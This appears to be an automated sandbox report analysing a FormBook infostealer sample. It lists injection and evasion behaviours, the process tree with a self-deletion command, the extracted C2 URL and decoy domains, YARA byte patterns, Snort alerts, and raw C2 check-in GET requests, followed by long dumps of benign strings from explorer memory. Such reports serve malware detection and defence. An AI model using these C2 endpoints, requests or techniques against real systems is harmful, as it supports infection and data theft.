
Windows Analysis Report
yPURXYpFVuXra2o.exe

Overview

General Information

Sample name:yPURXYpFVuXra2o.exe
Analysis ID:1450804
MD5:6c73961037087d34597fc8a582388bcc
SHA1:fc96081d921b7f82b9c559ffc335b02364199fd7
SHA256:93815b97bf6c09abc9e705096381dd25b658853e0751f7b95cc51123c251bcf2

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64native
  • yPURXYpFVuXra2o.exe (PID: 2392 cmdline: "C:\Users\user\Desktop\yPURXYpFVuXra2o.exe" MD5: 6C73961037087D34597FC8A582388BCC)
    • yPURXYpFVuXra2o.exe (PID: 7124 cmdline: "C:\Users\user\Desktop\yPURXYpFVuXra2o.exe" MD5: 6C73961037087D34597FC8A582388BCC)
      • explorer.exe (PID: 5272 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
        • cscript.exe (PID: 4960 cmdline: "C:\Windows\SysWOW64\cscript.exe" MD5: 13783FF4A2B614D7FBD58F5EEBDEDEF6)
          • cmd.exe (PID: 3460 cmdline: /c del "C:\Users\user\Desktop\yPURXYpFVuXra2o.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 4440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
{"C2 list": ["www.spiritualpath.info/cr12/"], "decoy": ["nff1291.com", "satyainfra.com", "hechiceradeamores.com", "jfgminimalist.com", "qut68q.com", "pedandmore.com", "sugardefender24-usa.us", "somalse.com", "lotusluxecandle.com", "certificadobassetpro.com", "veryaroma.com", "thehistoryofindia.in", "33155.cc", "terastudy.net", "84031.vip", "heilsambegegnen.com", "horizon-rg.info", "junongpei.website", "winstons.club", "henslotalt.us", "home-care-72875.bond", "elmetaversal.com", "thetrendingproduct.com", "kiki-hello-jury.com", "fertami.info", "free-cell-phones-en-arena.sbs", "emilogiska.com", "airexam.in", "masters-of-1.com", "othersidings.com", "fullpaw.com", "xmmtrader.com", "astronomersparadise.net", "cert.agency", "pools-97641.bond", "forexsignals-trading.com", "bxsmediaconsulting.com", "perfectedskincare.com", "footresort.com", "warehouse-inventory-80963.bond", "purifygenius.com", "bolinkpass.club", "velleclub.com", "epuar.com", "winningpickleballshots.com", "spiaggia.club", "kadinzuri.com", "keyboards-280323.cfd", "africanfemalefounders.club", "tkoelectriical.com", "wg5688.com", "properrr.com", "fortune-tiger-rede.com", "65302.vip", "psychologyzerodegrees.today", "top99bet4d.site", "priuswuxi.com", "carneden.com", "ptwix.xyz", "furniture-70925.bond", "064817.com", "ferradaoffroad.com", "pix2click.life", "jurj.xyz"]}
Source | Rule | Description | Author | Strings
00000007.00000002.35220353111.0000000004FF0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
    00000007.00000002.35220353111.0000000004FF0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000007.00000002.35220353111.0000000004FF0000.00000040.10000000.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      • 0x18849:$sqlite3step: 68 34 1C 7B E1
      • 0x1895c:$sqlite3step: 68 34 1C 7B E1
      • 0x18878:$sqlite3text: 68 38 2A 90 C5
      • 0x1899d:$sqlite3text: 68 38 2A 90 C5
      • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
      00000007.00000002.35220353111.0000000004FF0000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000007.00000002.35220353111.0000000004FF0000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Source | Rule | Description | Author | Strings
      5.2.yPURXYpFVuXra2o.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
        5.2.yPURXYpFVuXra2o.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          5.2.yPURXYpFVuXra2o.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
          • 0x18849:$sqlite3step: 68 34 1C 7B E1
          • 0x1895c:$sqlite3step: 68 34 1C 7B E1
          • 0x18878:$sqlite3text: 68 38 2A 90 C5
          • 0x1899d:$sqlite3text: 68 38 2A 90 C5
          • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
          5.2.yPURXYpFVuXra2o.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          5.2.yPURXYpFVuXra2o.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
          • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          No Sigma rule has matched
          Timestamp:06/03/24-08:51:59.597269
          SID:2031412
          Source Port:50420
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/03/24-08:54:04.267969
          SID:2031412
          Source Port:50424
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/03/24-08:55:06.601778
          SID:2031412
          Source Port:50425
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/03/24-08:48:54.513491
          SID:2031412
          Source Port:50413
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/03/24-08:49:36.291491
          SID:2031412
          Source Port:50415
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/03/24-08:53:21.780359
          SID:2031412
          Source Port:50422
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/03/24-08:53:42.406609
          SID:2031412
          Source Port:50423
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/03/24-08:50:16.815432
          SID:2031412
          Source Port:50416
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/03/24-08:50:57.933052
          SID:2031412
          Source Port:50418
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/03/24-08:47:33.122866
          SID:2031412
          Source Port:50410
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/03/24-08:47:53.631791
          SID:2031412
          Source Port:50411
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/03/24-08:50:37.423270
          SID:2031412
          Source Port:50417
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/03/24-08:51:18.553227
          SID:2031412
          Source Port:50419
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/03/24-08:48:13.875537
          SID:2031412
          Source Port:50412
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/03/24-08:52:40.866374
          SID:2031412
          Source Port:50421
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          AV Detection

          Source: 00000007.00000002.35220436271.0000000005020000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: FormBook (same configuration as listed above: C2 www.spiritualpath.info/cr12/ and the decoy domain list)
          Source: yPURXYpFVuXra2o.exe | ReversingLabs: Detection: 31%
          Source: yPURXYpFVuXra2o.exe | Virustotal: Detection: 34%
          Source: Yara match | File source: 5.2.yPURXYpFVuXra2o.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.yPURXYpFVuXra2o.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000007.00000002.35220353111.0000000004FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.35220436271.0000000005020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.32567719158.000000000415E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: yPURXYpFVuXra2o.exe | Joe Sandbox ML: detected
          Source: yPURXYpFVuXra2o.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: yPURXYpFVuXra2o.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: cscript.pdbUGP source: yPURXYpFVuXra2o.exe, 00000005.00000002.30408359939.0000000003710000.00000040.10000000.00040000.00000000.sdmp, yPURXYpFVuXra2o.exe, 00000005.00000002.30406647989.0000000001368000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: yPURXYpFVuXra2o.exe, 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000007.00000003.30409751558.0000000004FCD000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000007.00000002.35220640109.00000000052AD000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000007.00000002.35220640109.0000000005180000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000007.00000003.30406496494.0000000004E20000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: yPURXYpFVuXra2o.exe, yPURXYpFVuXra2o.exe, 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, cscript.exe, 00000007.00000003.30409751558.0000000004FCD000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000007.00000002.35220640109.00000000052AD000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000007.00000002.35220640109.0000000005180000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000007.00000003.30406496494.0000000004E20000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: cscript.pdb source: yPURXYpFVuXra2o.exe, 00000005.00000002.30408359939.0000000003710000.00000040.10000000.00040000.00000000.sdmp, yPURXYpFVuXra2o.exe, 00000005.00000002.30406647989.0000000001368000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, cscript.exe, 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_00412674 GetFileAttributesW,GetLastError,FindFirstFileW,WideCharToMultiByte,GetLastError,WideCharToMultiByte,GetFileAttributesA,GetLastError,FindFirstFileA,FindClose, | 7_2_00412674
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 4x nop then pop edi | 5_2_00417DA6
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 4x nop then pop edi | 7_2_03017DA6

          Networking

          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50410 -> 103.224.212.213:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50411 -> 172.67.182.124:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50412 -> 84.32.84.251:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50413 -> 172.67.158.76:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50415 -> 40.81.24.207:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50416 -> 3.33.130.190:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50417 -> 103.169.142.0:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50418 -> 104.21.11.125:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50419 -> 91.195.240.19:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50420 -> 172.67.185.213:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50421 -> 104.247.81.94:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50422 -> 3.33.130.190:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50423 -> 64.190.62.22:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50424 -> 40.81.24.207:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50425 -> 66.94.112.248:80
          Source: C:\Windows\explorer.exe | Network Connect: 103.224.212.213 80
          Source: C:\Windows\explorer.exe | Network Connect: 172.67.182.124 80
          Source: Malware configuration extractor | URLs: www.spiritualpath.info/cr12/
          Source: global traffic | HTTP traffic detected: GET /cr12/?XDHHT=vl9/KZA8hSVZlZYYRwiRPHDwK+fMeRW7mLcdcO2HrZ8WCY+A9QkbN6YtC02r8Olco4RS&MZt0=njKl2H4htFXPs HTTP/1.1 | Host: www.bolinkpass.club | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /cr12/?XDHHT=EMrw1bwJWliw0FwpqVXnoYhnVkfUleLKpzdhUAtZvcFg+78qkpfmZQ0FVMWvYMkzI5s2&MZt0=njKl2H4htFXPs HTTP/1.1 | Host: www.spiritualpath.info | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: Joe Sandbox View | IP Address: 103.224.212.213
          Source: Joe Sandbox View | ASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU
          Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
          Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknown | UDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: C:\Windows\explorer.exe | Code function: 6_2_13971F82 getaddrinfo,setsockopt,recv, | 6_2_13971F82
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: ","url":"https://www.msn.com/en-us/movies/news/netflix-users-celebrate-as-2023-masterpiece-finally-debuts-online/ar-BB1nu0QG","locale":"en-us","isLocalContent":false,"publishedDateTime":"2024-06-02T13:35:42Z","feed":{"id":"Y_2a7bc05a-60f4-46df-a4ef-e938b38a4ccd","feedName":"Movies","lastFreActionTimestamp":0},"isFeatured":false,"images":[{"width":1200,"height":900,"url":"https://th.bing.com/th?id=ORMS.c01bb8b43615341dbbfa0ad17bc05a9f&pid=Wdp","title":"Godzilla-Minus-One.png","caption":"Godzilla-Minus-One.png","focalRegion":{"x1":428,"x2":819,"y1":321,"y2":712},"source":"msn","colorSamples":[{"isDarkMode":true,"hexColor":"#24241C","isGreyScale":false},{"isDarkMode":false,"hexColor":"#DDD5C0","isGreyScale":false}]}],"colorSamples":[{"isDarkMode":true,"hexColor":"#24241C","isGreyScale":false},{"isDarkMode":false,"hexColor":"#DDD5C0","isGreyScale":false}],"provider":{"id":"AA2ebJ","name":"The Independent","logoUrl":"https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBERG9W.img","profileId":"vid-xgcughpui3cy7wqqbraqf5xbef43jb7gjx5j8888ng5fsgus3ggs"},"category":"movies","reactionSummary":{"totalCount":118,"subReactionSummaries":[{"totalCount":90,"type":"upvote"},{"totalCount":28,"type":"downvote"}]},"reactionStatus":"on","commentSummary":{"totalCount":20,"subCommentSummaries":[{"totalCount":19,"type":"comment"},{"totalCount":1,"type":"reply"}]},"commentStatus":"on","cardId":3,"reasons":[{"type":"cF_Ip","rank":0}],"ri":"334","recoId":"m9EZkeedgX5eUa-QBobFkaKzgm","source":"msn"},{"id":"BB1n3Nf3","type":"article","title":"Don't Be Afraid: Buy Your Favorite TV Shows on DVD","abstract":"It's not hoarding Honey, it's 
preservation.","url":"https://www.msn.com/en-us/money/personalfinance/don-t-be-afraid-buy-your-favorite-tv-shows-on-dvd/ar-BB1n3Nf3","locale":"en-us","isLocalContent":false,"publishedDateTime":"2024-05-25T15:00:14Z","feed":{"id":"Y_f714b6e2-e9db-41d0-9b5f-b2e0a52f85da","feedName":"Money","lastFreActionTimestamp":0},"isFeatured":false,"images":[{"width":2100,"height":1400,"url":"https://th.bing.com/th?id=ORMS.8a8aef162e5c1943681182b7e2d02b5e&pid=Wdp","title":"Don't Be Afraid: Buy Your Favorite TV Shows on DVD","source":"msn","colorSamples":[{"isDarkMode":true,"hexColor":"#54451B","isGreyScale":false},{"isDarkMode":false,"hexColor":"#EBCED3","isGreyScale":false}]}],"colorSamples":[{"isDarkMode":true,"hexColor":"#54451B","isGreyScale":false},{"isDarkMode":false,"hexColor":"#EBCED3","isGreyScale":false}],"provider":{"id":"BB1loBHK","name":"HowToGeek","logoUrl":"https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1loxoX.img","profileId":"vid-vwhvix47d73xx49epp3y40e054g07u736snsjdfvimbykjwx62bs"},"category":"money","reactionSummary":{"totalCount":19,"subReactionSummaries":[{"totalCount":17,"type":"upvote"},{"totalCount":2,"type":"downvote"}]},"reactionStatus":"on","commentSummary":{"totalCount":1,"subCommentSummaries":[{"totalCount":1,"type":"comment"}]},"commentStatus":"on","cardId":4,"reasons":[{"type":"explore","rank":0,"follow":{"id":
          Source: explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: s Spider-Man Remastered 08:54 - A Plague Tale Requiem 10:00 - Assassin's Creed Mirage 10:24 - Watch Dogs Legion 10:44 - Hitman 3 11:28 - Counter Strike 2 12:13 - Call Of Duty Modern Warfare III 12:50 - 12 Game Average [1080p] 13:43 - Final Thoughts Read this feature on TechSpot: https://www.techspot.com/review/2821-amd-ryzen-7800x3d-7900x3d-7950x3d/ V Cache Battle: 7800X3D vs 7900X3D vs 7950X3D Disclaimer: Any pricing information shown or mentioned in this video was accurate at the time of video production, and may have since changed Disclosure: As an Amazon Associate we earn from qualifying purchases. We may also earn a commission on some sales made through other store links FOLLOW US IN THESE PLACES FOR UPDATES Twitter - http://twitter.com/hardwareunboxed Facebook - http://facebook.com/hardwareunboxed Instagram - https://www.instagram.com/hardwareunboxed/ Outro music by David Vonk/DaJaVo","url":"https://www.youtube.com/watch?v=Gu12QOQiUUI","locale":"en-us","isLocalContent":false,"publishedDateTime":"2024-03-28T10:00:23","feed":{"feedName":"news","lastFreActionTimestamp":0},"isFeatured":false,"images":[{"width":3840,"height":2160,"url":"https://th.bing.com/th?id=OVP.Zg5kob1eG3vNAhn5g3iOGQHgFo","title":"AMD Ryzen 7 7800X3D vs. Ryzen 9 7900X3D vs. Ryzen 9 7950X3D, Gaming Benchmark","caption":"AMD Ryzen 7 7800X3D vs. Ryzen 9 7900X3D vs. 
Ryzen 9 7950X3D, Gaming Benchmark","source":"bing","colorSamples":[{"isDarkMode":true,"hexColor":"#2E2E2E","isGreyScale":false},{"isDarkMode":false,"hexColor":"#F5F5F5","isGreyScale":false}]}],"colorSamples":[{"isDarkMode":true,"hexColor":"#253D3B","isGreyScale":false},{"isDarkMode":false,"hexColor":"#EAF5F5","isGreyScale":false}],"provider":{"id":"vid-gkg786ucfpu46xnx5n80yvfyceqwsqweke9jhc8g7a0782qsfc0a","name":"Hardware Unboxed","logoUrl":"https://www.bing.com/th?id=AR_e1aad59e9b84f32b322c4036057c9f3d"},"category":"news","reactionSummary":{"totalCount":30,"subReactionSummaries":[{"totalCount":24,"type":"upvote"},{"totalCount":6,"type":"downvote"}]},"reactionStatus":"on","commentSummary":{"totalCount":0},"commentStatus":"on","cardId":7,"reasons":[{"type":"explore","rank":0,"follow":{"id":"","name":"gaming","time":""}}],"recoId":"m9EZkeedgX5eUa-QBobFkaKzgm","source":"WebVideo"},{"id":"BB1j6YDZ","type":"video","title":"Top 10 Catchiest Songs of the 2010s","abstract":"These songs have been living rent-free in our head for years! For this list, we equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: s Spider-Man Remastered 08:54 - A Plague Tale Requiem 10:00 - Assassin's Creed Mirage 10:24 - Watch Dogs Legion 10:44 - Hitman 3 11:28 - Counter Strike 2 12:13 - Call Of Duty Modern Warfare III 12:50 - 12 Game Average [1080p] 13:43 - Final Thoughts Read this feature on TechSpot: https://www.techspot.com/review/2821-amd-ryzen-7800x3d-7900x3d-7950x3d/ V Cache Battle: 7800X3D vs 7900X3D vs 7950X3D Disclaimer: Any pricing information shown or mentioned in this video was accurate at the time of video production, and may have since changed Disclosure: As an Amazon Associate we earn from qualifying purchases. We may also earn a commission on some sales made through other store links FOLLOW US IN THESE PLACES FOR UPDATES Twitter - http://twitter.com/hardwareunboxed Facebook - http://facebook.com/hardwareunboxed Instagram - https://www.instagram.com/hardwareunboxed/ Outro music by David Vonk/DaJaVo","url":"https://www.youtube.com/watch?v=Gu12QOQiUUI","locale":"en-us","isLocalContent":false,"publishedDateTime":"2024-03-28T10:00:23","feed":{"feedName":"news","lastFreActionTimestamp":0},"isFeatured":false,"images":[{"width":3840,"height":2160,"url":"https://th.bing.com/th?id=OVP.Zg5kob1eG3vNAhn5g3iOGQHgFo","title":"AMD Ryzen 7 7800X3D vs. Ryzen 9 7900X3D vs. Ryzen 9 7950X3D, Gaming Benchmark","caption":"AMD Ryzen 7 7800X3D vs. Ryzen 9 7900X3D vs. 
Ryzen 9 7950X3D, Gaming Benchmark","source":"bing","colorSamples":[{"isDarkMode":true,"hexColor":"#2E2E2E","isGreyScale":false},{"isDarkMode":false,"hexColor":"#F5F5F5","isGreyScale":false}]}],"colorSamples":[{"isDarkMode":true,"hexColor":"#253D3B","isGreyScale":false},{"isDarkMode":false,"hexColor":"#EAF5F5","isGreyScale":false}],"provider":{"id":"vid-gkg786ucfpu46xnx5n80yvfyceqwsqweke9jhc8g7a0782qsfc0a","name":"Hardware Unboxed","logoUrl":"https://www.bing.com/th?id=AR_e1aad59e9b84f32b322c4036057c9f3d"},"category":"news","reactionSummary":{"totalCount":30,"subReactionSummaries":[{"totalCount":24,"type":"upvote"},{"totalCount":6,"type":"downvote"}]},"reactionStatus":"on","commentSummary":{"totalCount":0},"commentStatus":"on","cardId":7,"reasons":[{"type":"explore","rank":0,"follow":{"id":"","name":"gaming","time":""}}],"recoId":"m9EZkeedgX5eUa-QBobFkaKzgm","source":"WebVideo"},{"id":"BB1j6YDZ","type":"video","title":"Top 10 Catchiest Songs of the 2010s","abstract":"These songs have been living rent-free in our head for years! For this list, we equals www.twitter.com (Twitter)
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: s Spider-Man Remastered 08:54 - A Plague Tale Requiem 10:00 - Assassin's Creed Mirage 10:24 - Watch Dogs Legion 10:44 - Hitman 3 11:28 - Counter Strike 2 12:13 - Call Of Duty Modern Warfare III 12:50 - 12 Game Average [1080p] 13:43 - Final Thoughts Read this feature on TechSpot: https://www.techspot.com/review/2821-amd-ryzen-7800x3d-7900x3d-7950x3d/ V Cache Battle: 7800X3D vs 7900X3D vs 7950X3D Disclaimer: Any pricing information shown or mentioned in this video was accurate at the time of video production, and may have since changed Disclosure: As an Amazon Associate we earn from qualifying purchases. We may also earn a commission on some sales made through other store links FOLLOW US IN THESE PLACES FOR UPDATES Twitter - http://twitter.com/hardwareunboxed Facebook - http://facebook.com/hardwareunboxed Instagram - https://www.instagram.com/hardwareunboxed/ Outro music by David Vonk/DaJaVo","url":"https://www.youtube.com/watch?v=Gu12QOQiUUI","locale":"en-us","isLocalContent":false,"publishedDateTime":"2024-03-28T10:00:23","feed":{"feedName":"news","lastFreActionTimestamp":0},"isFeatured":false,"images":[{"width":3840,"height":2160,"url":"https://th.bing.com/th?id=OVP.Zg5kob1eG3vNAhn5g3iOGQHgFo","title":"AMD Ryzen 7 7800X3D vs. Ryzen 9 7900X3D vs. Ryzen 9 7950X3D, Gaming Benchmark","caption":"AMD Ryzen 7 7800X3D vs. Ryzen 9 7900X3D vs. Ryzen 9 7950X3D, Gaming 